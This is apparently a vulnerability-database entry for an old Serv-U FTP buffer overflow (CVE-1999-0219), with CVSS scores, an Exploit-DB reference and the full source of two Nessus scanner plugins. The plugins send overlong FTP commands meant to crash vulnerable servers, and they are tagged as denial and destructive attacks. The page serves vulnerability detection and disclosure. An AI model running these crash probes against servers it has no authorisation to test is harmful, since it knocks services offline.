Vulnerabilities > CVE-1999-0219 - Unspecified vulnerability in CAT Soft Serv-U 2.5
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
NONE Integrity impact
NONE Availability impact
COMPLETE Summary
Buffer overflow in FTP Serv-U 2.5 allows remote authenticated users to cause a denial of service (crash) via a long (1) CWD or (2) LS (list) command.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 1 |
Exploit-Db
| description | Cat Soft Serv-U 2.5 Buffer Overflow Vulnerabilities. CVE-1999-0219. Remote exploit for linux platform |
| id | EDB-ID:19218 |
| last seen | 2016-02-02 |
| modified | 1999-05-03 |
| published | 1999-05-03 |
| reporter | Arne Vidstrom |
| source | https://www.exploit-db.com/download/19218/ |
| title | Cat Soft Serv-U 2.5 - Buffer Overflow Vulnerabilities |
Nessus
NASL family FTP NASL id FTP_SERVU_DOS.NASL description The remote FTP server is affected by a buffer overflow vulnerability. A remote, authenticated user can cause a denial of service via a long last seen 2020-06-01 modified 2020-06-02 plugin id 10089 published 1999-06-22 reporter This script is Copyright (C) 1999-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/10089 title Serv-U CWD Command Overflow code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(10089); script_version("1.38"); script_cvs_date("Date: 2018/07/11 17:09:24"); script_cve_id("CVE-1999-0219"); script_bugtraq_id(269); script_name(english:"Serv-U CWD Command Overflow"); script_summary(english:"Attempts a CWD buffer overflow"); script_set_attribute(attribute:"synopsis", value:"The remote FTP server is affected by a buffer overflow vulnerability."); script_set_attribute(attribute:"description", value: "The remote FTP server is affected by a buffer overflow vulnerability. A remote, authenticated user can cause a denial of service via a long 'CWD' or 'LS' command. An attacker could exploit this to crash the affected host."); script_set_attribute(attribute:"solution", value:"There is no known solution at this time."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"1997/07/01"); script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_DENIAL); script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc."); script_family(english:"FTP"); script_dependencie("ftp_anonymous.nasl", "ftpserver_detect_type_nd_version.nasl"); # script_exclude_keys("ftp/msftpd"); script_require_keys("ftp/login", "ftp/servu", "Settings/ParanoidReport"); script_require_ports("Services/ftp", 21); exit(0); } include("audit.inc"); include("global_settings.inc"); include('misc_func.inc'); include('ftp_func.inc'); if (report_paranoia < 2) audit(AUDIT_PARANOID); login = get_kb_item_or_exit("ftp/login"); password = get_kb_item("ftp/password"); port = get_ftp_port(default: 21); banner = get_ftp_banner(port:port); if ( !banner || "Serv-U FTP Server" >!< banner ) exit(0); soc = open_sock_tcp(port); if (! soc) exit(1); if(ftp_authenticate(socket:soc, user:login, pass:password)) { s = strcat('CWD ', crap(4096), '\r\n'); send(socket:soc, data:s); r = recv_line(socket:soc, length:1024); if (!r) security_hole(port); } close(soc);NASL family FTP NASL id FTP_OVERFLOW.NASL description The remote FTP server closes the connection when a command or argument is too long. This is probably due to a buffer overflow and may allow an attacker to execute arbitrary code on the remote host. last seen 2020-06-01 modified 2020-06-02 plugin id 10084 published 1999-06-22 reporter This script is Copyright (C) 1999-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/10084 title Multiple FTP Server Command Handling Overflow code # # (C) Tenable Network Security, Inc. # if (NASL_LEVEL < 3000) exit(0); include("compat.inc"); if(description) { script_id(10084); script_version ("1.85"); script_cve_id( "CVE-1999-0219", "CVE-2000-0870", "CVE-2000-0943", "CVE-2000-1035", "CVE-2000-1194", "CVE-2002-0126", "CVE-2003-0271", "CVE-2005-0634", "CVE-2005-1415" ); script_bugtraq_id(269, 1227, 1675, 1690, 1858, 3884, 7251, 7278, 7307, 12704, 13454); script_name(english:"Multiple FTP Server Command Handling Overflow"); script_set_attribute(attribute:"synopsis", value: "The remote FTP server is susceptible to buffer overflow attacks." ); script_set_attribute(attribute:"description", value: "The remote FTP server closes the connection when a command or argument is too long. This is probably due to a buffer overflow and may allow an attacker to execute arbitrary code on the remote host." ); script_set_attribute(attribute:"solution", value: "Upgrade / switch the FTP server software or disable the service if it is not needed." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'GlobalSCAPE Secure FTP Server Input Overflow'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "1999/06/22"); script_set_attribute(attribute:"vuln_publication_date", value: "1997/07/01"); script_cvs_date("Date: 2018/08/31 12:25:01"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); summary["english"] = "attempts some buffer overflows"; script_summary(english:summary["english"]); script_category(ACT_DESTRUCTIVE_ATTACK); script_copyright(english: "This script is Copyright (C) 1999-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"FTP"); script_dependencies("ftpserver_detect_type_nd_version.nasl"); script_require_keys("ftp/login", "ftp/password"); script_exclude_keys("global_settings/supplied_logins_only"); script_require_ports("Services/ftp", 21); exit(0); } # # The script code starts here # include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("ftp_func.inc"); if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY); global_var port = get_ftp_port(default: 21); foreach f (make_list("msftpd", "ncftpd", "fw1ftpd", "vxftpd")) if (get_kb_item("ftp/"+port+"/"+f)) exit(0, "The FTP server on port "+port+" is "+f+"."); function is_vulnerable (value) { if (service_is_dead(port: port) > 0) { set_kb_item(name:"ftp/overflow", value:TRUE); set_kb_item(name:"ftp/"+port+"/overflow", value:TRUE); set_kb_item(name:"ftp/"+port+"/overflow_method", value:value); security_hole(port); } exit (0); } soc = open_sock_tcp(port); if (! soc) exit(1, "Connection failed to port "+port+"."); ftp_debug(str:"custom banner"); d = ftp_recv_line(socket:soc); if(!d){ close(soc); exit(1, "No answer on port "+port+"."); } if(!egrep(pattern:"^220[ -]", string:d)) { # not an FTP server close(soc); exit(1, "The service on port "+port+" does not look like FTP."); } if ("Microsoft FTP Service" >< d) exit(0, "MS FTP is running on port "+port+"."); req = 'USER ftp\r\n'; send(socket:soc, data:req); d = ftp_recv_line(socket:soc); ftp_close(socket:soc); if(!d) { exit(1, "No answer on port "+port+"."); } soc = open_sock_tcp(port); if ( ! soc ) exit(1, "Connection failed to port "+port+"."); d = ftp_recv_line(socket:soc); s = ('USER ' + crap(4096) + '\r\n'); send(socket:soc, data:s); d = ftp_recv_line(socket:soc); if(!d){ close (soc); is_vulnerable (value:"USER"); } # Let's try to access it with valid credentials now. login = get_kb_item("ftp/login"); password = get_kb_item("ftp/password"); s = ('USER ' + login + '\r\n'); send(socket:soc, data:s); d = ftp_recv_line(socket:soc); # ProFTPD 1.5.2 crashes with more than 12 KB s = ('PASS ' + crap(12500) + '\r\n'); send(socket:soc, data:s); d = ftp_recv_line(socket:soc); if(!d){ close (soc); is_vulnerable (value:"PASS"); } s = ('PASS ' + password + '\r\n'); send(socket:soc, data:s); d = ftp_recv_line(socket:soc); if(!d) exit(1, "No answer from port "+port+"."); foreach cmd (make_list ('CWD', 'LIST', 'STOR', 'RNTO', 'MKD', 'XMKD', 'RMD', 'XRMD', 'APPE', 'SIZE', 'RNFR', 'HELP', '')) { s = (cmd + ' ' + crap(4096) + '\r\n'); d = ftp_recv_line(socket:soc); if (! d) { close (soc); is_vulnerable (value: cmd); } } if ( soc ) close(soc);